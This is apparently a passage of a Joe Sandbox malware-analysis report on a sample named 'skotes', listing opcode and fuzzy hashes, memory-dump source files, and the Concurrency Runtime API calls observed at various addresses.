                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 1965bc16f93dde776510aab7df7d732acfab4de2b87fea993c2f731cf6038c0a
                                                                                                                                                                • Instruction ID: df6358a07e654e3741200cfb99cbe89f17fcbd75d99d67406242d74b06e8ea83
                                                                                                                                                                • Opcode Fuzzy Hash: 1965bc16f93dde776510aab7df7d732acfab4de2b87fea993c2f731cf6038c0a
                                                                                                                                                                • Instruction Fuzzy Hash: 5511D2F634D214BD614240A62B54AFA6B1FD6D2738B30C937B807CA642F3552A5A7031
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e41376fcdd985d89cae2e966b2650b7b59e948ce17f7258c15dd694ec709b3ee
                                                                                                                                                                • Instruction ID: 2b3967fd0d718c1ea736a9aae23dde8308f71cfe3d433f676929fd9e987af350
                                                                                                                                                                • Opcode Fuzzy Hash: e41376fcdd985d89cae2e966b2650b7b59e948ce17f7258c15dd694ec709b3ee
                                                                                                                                                                • Instruction Fuzzy Hash: 771103E724E154BDA20284626B50AFA2B6FD2C2734B31CC27F447C9506F259298E6132
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 87fe3d5824cca151a428dc3d5d752ab598c768e6ef85b6105fe5a63dda62a6b3
                                                                                                                                                                • Instruction ID: af0182c414225222acd9b7fb8af465f74192240c83be30a77d8fad0a7bf44612
                                                                                                                                                                • Opcode Fuzzy Hash: 87fe3d5824cca151a428dc3d5d752ab598c768e6ef85b6105fe5a63dda62a6b3
                                                                                                                                                                • Instruction Fuzzy Hash: 2111B2E634D210BEA14141662F64AFA2B2FE2D2738B30C937F847C5642F7552A5A7132
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 735e4c2428f0e99f3e5d1a2a692286f80de62ee24e54e068bb3719cc92e78a73
                                                                                                                                                                • Instruction ID: 0c3a0ada16898bb61fec516e31d9b17b2802cb7f6941a6f3a9880a00608fdc0a
                                                                                                                                                                • Opcode Fuzzy Hash: 735e4c2428f0e99f3e5d1a2a692286f80de62ee24e54e068bb3719cc92e78a73
                                                                                                                                                                • Instruction Fuzzy Hash: A211B2E634D214BD614244666B54AFA2B2FE2D6734F30CD37F80BC6502F3542A5A7032
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4bb34767be29c45f0418db555eb537765acc79b626a503a6fc9f21cb22795884
                                                                                                                                                                • Instruction ID: 17421e8326bf3b5a8385763a82743759fd6f1a62d111cba7a10e6f836f0e3be9
                                                                                                                                                                • Opcode Fuzzy Hash: 4bb34767be29c45f0418db555eb537765acc79b626a503a6fc9f21cb22795884
                                                                                                                                                                • Instruction Fuzzy Hash: 751182EA34D110BD714140622B54AFA6B1FE2D6734B30CD37F80BC5642F3552A5A7032
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bae277f718c49f24604c5f596ac38991df0780ff737506925ee487cd6b321090
                                                                                                                                                                • Instruction ID: de6731d84c367d5e47645a30864c8f350c07c4f2ff7ba79b9f974e248301dfc1
                                                                                                                                                                • Opcode Fuzzy Hash: bae277f718c49f24604c5f596ac38991df0780ff737506925ee487cd6b321090
                                                                                                                                                                • Instruction Fuzzy Hash: ED11ADFA34D210BD614184A26B18BFA2B2FD2D6B34B31CD37F80BC9546F3552A5A7072
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e3fbc1b1d1b2d37297831bb57e826f4a2df4ffa890cbc1cb5072356692067c90
                                                                                                                                                                • Instruction ID: 1b523718c7693f3e24f31174b10c9db5e89f1f743e0619202605d8739dfdc371
                                                                                                                                                                • Opcode Fuzzy Hash: e3fbc1b1d1b2d37297831bb57e826f4a2df4ffa890cbc1cb5072356692067c90
                                                                                                                                                                • Instruction Fuzzy Hash: BE01CBA2A8C2406FC205606513263BBBF4F9783A24F30C52BE84B8EA42F2027056A1A0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3ea63eb1ee1efe76a15cb487007c5937e42d5c39342a3b3b462168aff7515ad8
                                                                                                                                                                • Instruction ID: c481e0d372200d32b9edbdde378e7d0be27bb02e756cdb6d44d0d00fc46d7046
                                                                                                                                                                • Opcode Fuzzy Hash: 3ea63eb1ee1efe76a15cb487007c5937e42d5c39342a3b3b462168aff7515ad8
                                                                                                                                                                • Instruction Fuzzy Hash: BCF0E2BA34D210FEA2824162A7153F93F0BE286738F30CD33F00B85A01B755365A7032
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5c289f04807968bab747a893981fb948770e344578bdda9a07f7b057080587a3
                                                                                                                                                                • Instruction ID: c75b5b460a4bdc87e8eda06ffe0679e6913313e317d37fb9936e097b250701d7
                                                                                                                                                                • Opcode Fuzzy Hash: 5c289f04807968bab747a893981fb948770e344578bdda9a07f7b057080587a3
                                                                                                                                                                • Instruction Fuzzy Hash: 3BF0E2B574C214EE9241156682813FA7A5BA753738F20C93BB04B4AA02F7163699B032
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 984c0d0e8004df55d81f49c93c2cc5619acc61dc6f38bb79a49ef9705a7b75ce
                                                                                                                                                                • Instruction ID: 1d124377c1b04986e7c412718620f07364771c6270cf43d94485f8c33228f314
                                                                                                                                                                • Opcode Fuzzy Hash: 984c0d0e8004df55d81f49c93c2cc5619acc61dc6f38bb79a49ef9705a7b75ce
                                                                                                                                                                • Instruction Fuzzy Hash: D2F0ECAA349200BEA1810176A2502BA3E1FA356338F30CD33F44B8AA01B611365A7032
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8a80c922a9bccc3845b1b6e7272221e56b00223cd0d1d28277907c642a6e2d32
                                                                                                                                                                • Instruction ID: 93cb91cbaa539c6dc9955bdef8eaa14fc3faecc27b77c81752cdd88623d1f4ef
                                                                                                                                                                • Opcode Fuzzy Hash: 8a80c922a9bccc3845b1b6e7272221e56b00223cd0d1d28277907c642a6e2d32
                                                                                                                                                                • Instruction Fuzzy Hash: D7E0AB9228C290EF920501621B156B3BF2FE043234B61CA3BF08F86E03B205360D6433
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 347590688e9c3349a604eb92c1ad80da0b15209d74f2be0bd6367fb40768ff97
                                                                                                                                                                • Instruction ID: 960e51514e4f67fe9d41c43e282e1747d6958c847ba4f966aab49c74cded4d43
                                                                                                                                                                • Opcode Fuzzy Hash: 347590688e9c3349a604eb92c1ad80da0b15209d74f2be0bd6367fb40768ff97
                                                                                                                                                                • Instruction Fuzzy Hash: 2BE02B9224C250BED14646521A15576BF2EE553234721CE2BF08B85953B6463619A532
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3dd6e6d245b17f002c618f2c9f45283bce512bc9a90f818cf5496f5eca002c97
                                                                                                                                                                • Instruction ID: 52ff130e5871c9ff18b822af04a25c43cd24fd1c23bcbddf41916936d4980318
                                                                                                                                                                • Opcode Fuzzy Hash: 3dd6e6d245b17f002c618f2c9f45283bce512bc9a90f818cf5496f5eca002c97
                                                                                                                                                                • Instruction Fuzzy Hash: DFE0DFE5749208EA5140026257542FA7A6FF953738F21CE3BF44B8A611BB50394AB032
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0b857582c13f1cfee93df04bda31048dc8f0a202a23b4b527f760bbb7f2e48c7
                                                                                                                                                                • Instruction ID: febcdf1e3fed804efa6d6aade6142aced6ae3e52ac5ace6b2a3086c3ddf35250
                                                                                                                                                                • Opcode Fuzzy Hash: 0b857582c13f1cfee93df04bda31048dc8f0a202a23b4b527f760bbb7f2e48c7
                                                                                                                                                                • Instruction Fuzzy Hash: CAD02BE628C550EB519001A2251027AFA2FE5C2334B21C937B09B819047B10341AB833
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: be9d848e05e8244cb1e48c0ea3fa90338d07f6321ae183b42a1e95a2a30a25ca
                                                                                                                                                                • Instruction ID: 0d71a546bb2898d976378678159958a3e22436d474dceaf709a4634b5c3e8acc
                                                                                                                                                                • Opcode Fuzzy Hash: be9d848e05e8244cb1e48c0ea3fa90338d07f6321ae183b42a1e95a2a30a25ca
                                                                                                                                                                • Instruction Fuzzy Hash: ACD02BC7A8C2586B0240109532603F3795F9187134B20C437EC079BD45F24628116071
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00BA0F16
                                                                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00BA0F62
                                                                                                                                                                  • Part of subcall function 00BA265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00BA2750
                                                                                                                                                                • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00BA0FCE
                                                                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00BA0FEA
                                                                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00BA103E
                                                                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00BA106B
                                                                                                                                                                • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00BA10C1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                                                • String ID: (
                                                                                                                                                                • API String ID: 2943730970-3887548279
                                                                                                                                                                • Opcode ID: 59ce967be32e287c72e062b7b7ac3bee9d7a32b6d7d540927ecc338fae807ad6
                                                                                                                                                                • Instruction ID: a49ba28f5276ac64566daac4956e8458fcc3c38a043b845df97e82af319dddf4
                                                                                                                                                                • Opcode Fuzzy Hash: 59ce967be32e287c72e062b7b7ac3bee9d7a32b6d7d540927ecc338fae807ad6
                                                                                                                                                                • Instruction Fuzzy Hash: 6CB17BB0A04615EFCB28DF68D981A7EB7F4FF49304F1445AEE905AB281D730AD81CB90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00BA2CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00BA2D0F
                                                                                                                                                                • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00BA1614
                                                                                                                                                                  • Part of subcall function 00BA2E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00BA2E39
                                                                                                                                                                  • Part of subcall function 00BA2E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00BA2EA8
                                                                                                                                                                • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00BA1746
                                                                                                                                                                • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00BA17A6
                                                                                                                                                                • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00BA17B2
                                                                                                                                                                • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00BA17ED
                                                                                                                                                                • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00BA180E
                                                                                                                                                                • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00BA181A
                                                                                                                                                                • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00BA1823
                                                                                                                                                                • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00BA183B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
